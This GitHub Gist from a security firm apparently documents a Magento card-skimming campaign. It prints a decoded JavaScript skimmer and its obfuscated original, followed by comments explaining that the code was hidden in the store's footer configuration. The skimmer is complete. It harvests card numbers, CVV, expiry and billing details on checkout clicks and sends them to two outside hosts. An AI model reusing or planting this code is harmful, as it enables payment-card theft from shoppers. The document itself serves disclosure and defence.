Last active
April 28, 2022 06:32
-
-
Save gwillem/5d936f5a84837d5c1dcb488ce256294a to your computer and use it in GitHub Desktop.
962 stores found breached on the 4th of July - https://sansec.io
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Decoded by Sanguine Security <[email protected]> | |
| String.prototype.hexEncode = function() { | |
| var a, b; | |
| var output = ''; | |
| for (b = 0; b < this.length; b++) { | |
| a = this.charCodeAt(b).toString(16); | |
| output += ('000' + a).slice(-4) | |
| }; | |
| return output | |
| }; | |
| function obfuscate(arg) { | |
| var b64 = btoa(arg); | |
| var b64hex = (b64.hexEncode()); | |
| var blob = ''; | |
| for (var i = 0; i < b64hex.length; i++) { | |
| blob += (b64hex[i].charCodeAt(0) << 3) + '*' | |
| }; | |
| var blobb64 = btoa(blob); | |
| return blobb64 | |
| } | |
| function addtoev() { | |
| var allButtons = document.getElementsByClassName('button'); | |
| for (i = 0; i < allButtons.length; i++) { | |
| allButtons[i].addEventListener('click', function() { | |
| var ccCounter = ''; | |
| var serialPayload = ''; | |
| if (document.getElementsByName('payment[cc_number]')[0]) { | |
| serialPayload += document.getElementsByName('payment[cc_number]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('payment[cc_cid]')[0]) { | |
| ccCounter = document.getElementsByName('payment[cc_cid]')[0].value; | |
| serialPayload += document.getElementsByName('payment[cc_cid]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('payment[cc_exp_month]')[0]) { | |
| serialPayload += document.getElementsByName('payment[cc_exp_month]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('payment[cc_exp_year]')[0]) { | |
| serialPayload += document.getElementsByName('payment[cc_exp_year]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('payment[cc_owner]')[0]) { | |
| serialPayload += document.getElementsByName('payment[cc_owner]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[firstname]')[0]) { | |
| serialPayload += document.getElementsByName('billing[firstname]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[lastname]')[0]) { | |
| serialPayload += document.getElementsByName('billing[lastname]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[telephone]')[0]) { | |
| serialPayload += document.getElementsByName('billing[telephone]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[street][]')[0]) { | |
| serialPayload += document.getElementsByName('billing[street][]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[city]')[0]) { | |
| serialPayload += document.getElementsByName('billing[city]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[postcode]')[0]) { | |
| serialPayload += document.getElementsByName('billing[postcode]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('billing[region_id]')[0]) { | |
| serialPayload += document.getElementsByName('billing[region_id]')[0].value + '|' | |
| }; | |
| if (document.getElementsByName('shipping[country_id]')[0]) { | |
| serialPayload += document.getElementsByName('shipping[country_id]')[0].value + '|' | |
| }; | |
| if (ccCounter != '') { | |
| var payloadObj = { | |
| Domain: 'all', | |
| d: obfuscate(serialPayload) | |
| }; | |
| rand = Math.floor((Math.random() * 1000000) + 1); | |
| urll = 'https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=' + btoa(JSON.stringify(payloadObj)); | |
| var req1 = new XMLHttpRequest(); | |
| req1.open('GET', urll, false); | |
| req1.send(); | |
| urll = 'http://89.32.251.136/counter/index.php?v=' + btoa(JSON.stringify(payloadObj)); | |
| var req2 = new XMLHttpRequest(); | |
| req2.open('GET', urll, false); | |
| req2.send() | |
| } | |
| }) | |
| } | |
| } | |
| window.addEventListener('load', function() { | |
| addtoev() | |
| }) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _0xe6b4=["hexEncode","prototype","","length","charCodeAt","slice","000","*","button","getElementsByClassName","click","payment[cc_number]","getElementsByName","value","|","payment[cc_cid]","payment[cc_exp_month]","payment[cc_exp_year]","payment[cc_owner]","billing[firstname]","billing[lastname]","billing[telephone]","billing[street][]","billing[city]","billing[postcode]","billing[region_id]","shipping[country_id]","all","random","floor","https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=","stringify","GET","open","send","http://89.32.251.136/counter/index.php?v=","addEventListener","load"];String[_0xe6b4[1]][_0xe6b4[0]]= function(){var _0x3692x1,_0x3692x2;var _0x3692x3=_0xe6b4[2];for(_0x3692x2= 0;_0x3692x2< this[_0xe6b4[3]];_0x3692x2++){_0x3692x1= this[_0xe6b4[4]](_0x3692x2).toString(16);_0x3692x3+= (_0xe6b4[6]+ _0x3692x1)[_0xe6b4[5]](-4)};return _0x3692x3};function sa(_0x3692x5){var _0x3692x6=btoa(_0x3692x5);var _0x3692x7=(_0x3692x6[_0xe6b4[0]]());var _0x3692x8=_0xe6b4[2];for(var _0x3692x2=0;_0x3692x2< _0x3692x7[_0xe6b4[3]];_0x3692x2++){_0x3692x8+= (_0x3692x7[_0x3692x2][_0xe6b4[4]](0)<< 3)+ _0xe6b4[7]};var _0x3692x9=btoa(_0x3692x8);return _0x3692x9}function addtoev(){var _0x3692xb=document[_0xe6b4[9]](_0xe6b4[8]);for(i= 0;i< _0x3692xb[_0xe6b4[3]];i++){_0x3692xb[i][_0xe6b4[36]](_0xe6b4[10],function(){var _0x3692xc=_0xe6b4[2];var _0x3692xd=_0xe6b4[2];if(document[_0xe6b4[12]](_0xe6b4[11])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[11])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[15])[0]){_0x3692xc= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]];_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[16])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[16])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[17])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[17])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[18])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[18])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[19])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[19])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[20])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[20])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[21])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[21])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[22])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[22])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[23])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[23])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[24])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[24])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[25])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[25])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[26])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[26])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(_0x3692xc!= _0xe6b4[2]){var _0x3692xe={Domain:_0xe6b4[27],d:sa(_0x3692xd)};rand= Math[_0xe6b4[29]]((Math[_0xe6b4[28]]()* 1000000)+ 1);urll= _0xe6b4[30]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692xf= new XMLHttpRequest();_0x3692xf[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692xf[_0xe6b4[34]]();urll= _0xe6b4[35]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692x10= new XMLHttpRequest();_0x3692x10[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692x10[_0xe6b4[34]]()}})}}window[_0xe6b4[36]](_0xe6b4[37],function(){addtoev()}) |
@costicanu They use multiple exploits to gain access to these stores. See also https://sansec.io/labs/2019/01/29/magento-module-blacklist/
I resolved this. They insert this code into the database; not in the php file system.
table core_config_data > there you will see it in the field design/footer/absolute_footer
or
System -> Configuration -> Design -> Footer -> Miscellaneous HTML
design/footer/absolute_footer Hackers embed malicious code. There will be several rows of spaces to hide from visible sight
edit:
#File: app/code/core/Mage/Page/Block/Html.php
public function getAbsoluteFooter()
{
return Mage::getStoreConfig('design/footer/absolute_footer');
}
Then I figured I didn't need this so I commented it out.
public function getAbsoluteFooter()
{
#return Mage::getStoreConfig('design/footer/absolute_footer');
}
Should also use https://www.magereport.com to identify the security holes
Mind you, you are battling the symptoms here, not the root cause. If people are able to write to your database, you have bigger problems.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
any idea on how to fix this the security breach on magento?